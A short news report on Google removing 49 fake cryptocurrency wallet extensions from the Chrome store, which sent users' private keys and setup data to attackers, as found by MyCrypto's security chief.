Google removed 49 malicious Chrome extensions from its online store that were supposed to be cryptocurrency wallet apps, but actually stole private keys from cryptocurrency wallets as well as users' cryptocurrencies. As reported by ZDNet, the malicious extensions were first discovered by MyCrypto's chief security officer, Harry Denley, who shared his findings with the media. According to Denley, all 49 extensions appear to have been created by the same person or group of people who he says are Russian-based threat actors. Also, all extensions have the same functionality, but their branding changes depending on who they are targeting. Denley has been able to identify malicious extensions masquerading as many well-known crypto wallet apps, including Ledger, Trexor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus, and KeepKey.
Malicious Crypto Wallet Extensions
The 49 malicious extensions work in much the same way as legitimate extensions, except that all data entered by a user during their setup was sent to the attacker's servers or to a Google form. While the attackers already have all the information they need to start stealing users' cryptocurrency, Denley conducted a test in which he found that the funds in his crypto wallet were not immediately stolen. He thinks this is due to the fact that the threat actor is interested in stealing only high-value targets or that he has not understood how to automate the operation and must manually access each account. In an article on Medium, MyCrypto explained that there has been an increase in malicious extensions targeting cryptocurrency in recent months, saying: “An analysis of our dataset suggests that malicious extensions slowly started to hit the store in February. 2020, they ramped up versions until March 2020 and then quickly released more extensions in April 2020. This means that our detection is greatly improving or the number of malicious extensions hitting browser stores to target cryptocurrency users It's growing exponentially. Speculate, it's hard to say why." Since the threat actor behind these malicious extensions has yet to be detected, they could probably try to launch a similar system in the future. via ZDNet